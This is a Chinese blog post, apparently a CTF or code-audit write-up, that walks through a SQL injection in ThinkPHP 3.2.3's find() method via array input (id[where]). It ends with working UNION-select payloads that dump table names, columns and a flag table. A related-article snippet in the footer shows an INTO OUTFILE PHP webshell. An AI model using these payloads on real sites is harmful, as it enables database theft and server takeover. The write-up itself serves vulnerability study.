Thinkphp 3.2.3 sql注入漏洞

最新推荐文章于 2024-05-31 01:02:12 发布
最新推荐文章于 2024-05-31 01:02:12 发布
阅读量1.3k 收藏
点赞数
分类专栏: ctf 代码审计 文章标签: sql 数据库 mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/giaogiao123/article/details/119957448
版权

源代码

class IndexController extends Controller {
    public function index(){
    $a=M('xxx');  //表名
    $id=I('GET.id');
    $b=$a->find($id);
    var_dump($b);
    }
}

创建一个test数据库
然后开启mysql命令行

CREATE TABLE `Course`(
`id` VARCHAR(20),
`username` VARCHAR(20) NOT NULL DEFAULT '',
`password` VARCHAR(20) NOT NULL,
PRIMARY KEY(`id`)
);

insert into Course values('1' , '1111' , '1111');
insert into Course values('2' , '2222' , '2222');

然后修改
thinkphp-3.2\thinkphp-3.2\Application\Home\Conf\config.php

<?php
return array(
	//'配置项'=>'配置值'
    'DB_TYPE'=>'mysqli',      //数据库类型
    'DB_HOST'=>'localhost',  //服务器地址
    'DB_NAME'=>'test',       //数据库名
    'DB_USER'=>'root',       //数据库账号
    'DB_PWD'=>'root',            //数据库密码
    'DB_PORT'=>3306,         //数据库端口
          //数据库表前缀
    'DB_CHARSET'=>'utf8',    //数据库字符编码
    'DB_DEBUG'  =>  TRUE   //数据库sql调试日志的开启
);

环境搭建完成
在这里插入图片描述测试payload
在这里插入图片描述
没问题,环境搭建完成

分析漏洞

其实问题首先出现在一个地方
在这里插入图片描述
我们看这里find函数判断$options是否为数字或者字符串,然后后面相当于把id设为一个数组
在这里插入图片描述相当于

$options=array(
'where'=>array(
'id'=>'1'
)
);

然后我们按照这种思路继续跟进
在_parseOption中发现
在这里插入图片描述

参数会进入函数,我们继续跟,进入_parseType
在这里插入图片描述

进入select函数
在这里插入图片描述
然后发现参数进入buildSelectSql,继续跟。
在这里插入图片描述
之后进入parseSql

在这里插入图片描述
跟进parsewhere
在这里插入图片描述
进入parsevalue,发现在这一步进行转义,注意观察,此时的1’已经变为1’/,我们跟进escapestring----继续跟进发现它使用了addslashes函数进行转义。
在这里插入图片描述
我们继续跟进
在这里插入图片描述
最后发现此时sql注入已经被阻拦。
在这里插入图片描述如果为数组呢
我们在尝试

数组注入

?id[where]=1’

到达find函数,这里find函数判断$options是否为字符串或者整数,因为我们传入的是一个数组直接跳过
在这里插入图片描述
此时我们的option为

$options=array(
'where'=>'1'
);

到达过滤的函数时,发现if判断没有进去,相当于直接过了。
在这里插入图片描述
按照刚才的方式往下走到_parseOptions,如果我们的options[‘where’]是数组的话会进入_parseType,我们前面说到,现在的options[‘where’]="1’"是个字符串,也就不会进入这个if,所以当目标数据库中的id字段是int型时可以绕过intval过滤。

接着往后走,直接在parsewhere中进入if$whereStr = $where; 最终返回的内容是WHERE 1’
在这里插入图片描述
在这里插入图片描述
最后我们的’也就被保留了下来
在这里插入图片描述
接下来就可以进行注入攻击了

payload

?id[where]=id=0 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3,4#



?id[where]=id=0 union select 1,(select group_concat(column_name) from information_schema.columns where table_name='flags'),3,4#



?id[where]=id=0 union select 1,(select flag4s from flags),3,4#
jing!
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Thinkphp3.2.3及以下版本漏洞整理
hackzkaq的博客
07-01 1万+
更多渗透技能 ,10余本电子书及渗透工具包,搜公众号:白帽子左一 中间件漏洞 一.RCE ThinkPHP3.2.3缓存函数设计缺陷可导致代码执行 概述 网站为了提高访问效率往往会将用户访问过的页面存入缓存来减少开销。 而Thinkphp 在使用缓存的时候是将数据序列化,然后存进一个 php 文件中,这使得命令执行等行为成为可能。 就是缓存函数设计不严格,导致攻击者可以插入恶意代码,直接getshell。 实验环境 redhat6+apache2+Mysql+php5+thinkphp3.2.3 漏洞.
【安全漏洞ThinkPHP 3.2.3 漏洞复现
2201_75857869的博客
03-03 1899
函数时没有参数传入,而我们找到的是有参数的,PHP7下起的ThinkPHP在调用有参函数却没有传入参数的情况下会报错,所以我们要选用PHP5而不选用PHP7.里的内容被存入了缓存文件php文件中,连带着我们输入的可控的php代码也在其中,然后包含了该文件,所以造成了命令执行。处,除了exp外,还有一处bind,这里同样也是用点拼接字符串,但是不同的是这里还拼接了一个冒号。,所以进入第二个分支,将我们的输入转化为十进制,恶意语句就被过滤了,后面就是正常的SQL语句了。最开始的字符传入的是0,才能去除掉冒号。
thinkPHP3.2.3sql注入漏洞
qq_50589021的博客
10-05 4318
前言 攻敌所必救: ThinkPHP中的常用方法汇总总结:M方法,D方法,U方法,I方法 Thinkphp3.2.3 安全开发须知 搭建: 首先第一步就是必须先放在www目录下(我是windows用的phpstudy)!!!! 创建数据库,表名一定与你接下来要M的名字的相对应 连接数据库的文件不多说了,自己配置:ThinkPHP/Conf/convention.php 配置控制器:\WWW\thinkphp3.2.3\Application\Home\Controller\Ind
ThinkPHP3.2.3代码审计之sql注入
最新发布
2301_79724395的博客
05-31 783
对于这个修复,说实话我很难理解是怎么实现修复的,只能去看别人的解释,首先造成我们漏洞原因就是用户的输入被带到了危险执行的地方,在我们这里,option就是相当于用户的输入,我们可以控制,而获取我们的sql语句的时候,也是根据option来控制的,而这个修复的话,其实就是要我们理解一下。我们回忆一下,这个漏洞关键是我们exp可控,导致我们在build我们sql语句的时候,可以根据对exp的控制,满足我们的if条件控制我们的sql语句,当然我们看到还有许许多多的解析,那他们能利用吗?
[复现]Thinkphp3.2.3 漏洞
热门推荐
kuuhh的博客
08-02 1万+
前言 纸上得来终觉浅,绝知此事要躬行。 日志泄露 ThinkPHP在开启DEBUG的情况下会在Runtime目录下生成日志,而且日志结构容易被猜解,造成信息泄露。 THINKPHP3.1结构:Runtime/Logs/Home/年份_月份_日期.log THINKPHP3.2 结构:Application/Runtime/Logs/Home/年份_月份_日期.log 需要注意的是日志的路径不是绝对的,开发者可以修改的,平时可以收集下用时fuzz。 SQL 注入 user表 一个小例子 代码如下 $id
thinkPHP3.2.3中sql注入漏洞
qq_52988816的博客
05-26 1893
下载:ThinkPHP3.2.3完整版 - ThinkPHP框架 配置 首先配置一下数据库 相对于TP5,可以先看下框架的特定函数 thinkphp3内置了很多大写函数 A 快速实例化Action类库 B 执行行为类 C 配置参数存取方法 D 快速实例化Model类库 F 快速简单文本数据存取方法 I 获取系统输⼊变(与tp5input方法类似) L 语言参数存取方法 M 快速高性能实例化模型 R 快速远程调用Action类方法 S 快速缓存存取方法 U URL动态生成和重定向方法 W 快速Widget输
ThinkPHP 3.2.3 RCE漏洞
归零者的博客
11-25 1693
用蚁剑连接地址:index.php?m=Home&c=Index&a=index&value[_filename]=./Application/Runtime/Logs/Common/23_11_25.log,密码为:8。访问index.php?ThinkPHP3.2.x 代码中如果模板赋值方法assign的第一个参数可控,可导致模板文件路径变量被覆盖为携带攻击代码的文件路径,导致任意文件包含,可执行任意代码。,burp 抓包,将路径改为。日志文件中包含执行代码。
免费thinkPHP3.2.3框架
07-20
《免费ThinkPHP3.2.3框架深度解析》 ThinkPHP3.2.3是一款深受开发者喜爱的开源PHP框架,以其简洁、高效的特性在Web开发领域占据了一席之地。本篇将深入探讨该框架的核心特点、主要功能以及如何进行实际应用。 一、...
think3.2.3_sql注入分析1
08-03
在本文中,我们将深入探讨关于ThinkPHP 3.2.3版本中的SQL注入漏洞,特别是如何利用这个漏洞以及其成因。SQL注入是一种常见的安全漏洞,允许攻击者通过输入恶意SQL代码来操纵数据库,获取、修改或删除敏感数据。 ...
ThinkPHP 3.2.3 核心版.zip
05-23
修正可能的SQL注入漏洞;[其它方面]支持全局路由定义;增加插件控制器支持;增加对全局和模块的模板路径的灵活设置;日志目录分模块存放;增加memcacheSession驱动;改进session函数的数组操作;修正一系列存在的...
ThinkPHP3.2.3框架实现执行原生SQL语句的方法示例
10-17
ThinkPHP3.2.3框架提供了预处理语句和参数绑定来防止SQL注入,但在这里直接使用原生SQL,开发者需要自行确保SQL语句的安全性。 总的来说,ThinkPHP3.2.3通过`query()`和`execute()`方法提供了一种灵活的方式来处理...
基于thinkphp3.2.3开发的电子商城(包含前后台)
06-17
系统应具备防止SQL注入、XSS攻击的安全机制,同时对敏感数据进行加密处理,确保用户信息的安全。 六、数据库设计 电子商城系统通常涉及商品表、订单表、用户表等多个核心表,需合理设计数据库结构,保证数据的一致...
Thinkphp3.2.3 SQL注入漏洞
Sentiment的博客
05-20 4470
下载:ThinkPHP3.2.3完整版 - ThinkPHP框架 配置 ThinkPHP/Conf/convention.php配置下数据库,我这里直接用的sqllabs的数据库 写个查询入口Application/Home/Controller/IndexController.class.php <?php namespace Home\Controller; use Think\Controller; class IndexController ex
tp3.2.3sql注入漏洞分析
qq_53856457的博客
05-18 1553
thinkphp3.2.3 sql注入漏洞分析 文章目录thinkphp3.2.3 sql注入漏洞分析thinkphp3.2.3 where注入环境配置数据库配置控制器payload:过程分析ThinkPHP3.2.3_bind注入1. 环境2. payload3. 过程分析thinkphp 3.2.3 exp注入1.环境2.payload:3. 过程分析**补充:**1.为什么I()方法能阻止sql注入?2.parseWhereItem方法设计缺陷3.漏洞代码中的where方法为什么要是数组的形式 先到t
thinkphp3.2.3 SQL注入漏洞复现
feng的博客
02-24 5561
前言 具体代码可以composer或者github或者一些其他网站上下载。 然后本地创建一下数据库,改一下数据库的配置,在ThinkPHP/Conf/convention.php下面: 由于比较懒,我直接用sqli-labs的数据库了,在IndexController.class.php里面写个查询: class IndexController extends Controller { public function index(){ $data = M('users')-&gt
9-PHP代码审计——thinkphp3.2.3数据库内核注入漏洞
网络安全
04-29 570
漏洞利用的poc: http://www.tptest.com/index.php/home/index/index?username[0]=exp&username[1]==%27admin%27 数据库内核注入漏洞thinkphp框架的数据库模块产生的漏洞,我们先通过一个案例来分析数据库操作模块的流程: 后台接收url请求中的username拼接到后台中执行,最终将查询到的内容返回,为了分析sql执行过程,开启debug调试模式。 class IndexContr..
ThinkPhp 5 目录结构及基础配置详解
唐大帅的编程之路
12-10 1万+
ThinkPhp 5 目录结构及基础配置详解
mysql 视图 中间表_mysql关联表中间表主表三张表的使用
weixin_42152298的博客
02-07 1061
想了想我还是觉得在写一篇关于多对多的文档吧,因为我看了官方的文档写的不够细,不好理解。我自己也花了时间去看人家的文档还有自己又做了一些测试才知道怎么用的现在把我做测试的所有过程分享给大家。数据库表与数据就从数据库表开始啦,因为这样可能会更利于大家去理解。大家都知道数据库多对多关系都是需要三张表来完成的,一张主表,一张关联表,还有一张中间表。比如我们这里主表是学生表关联课程表。因为一个学生可以学多们...
thinkphp3.2.3 rce漏洞复现
08-12
具体的漏洞利用方法是,在URL中注入`?id=1*/ into outfile "path/1.php" LINES STARTING BY '<?php eval($_POST<span class="em">1</span><span class="em">2</span><span class="em">3 #### 引用[.reference_title]...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值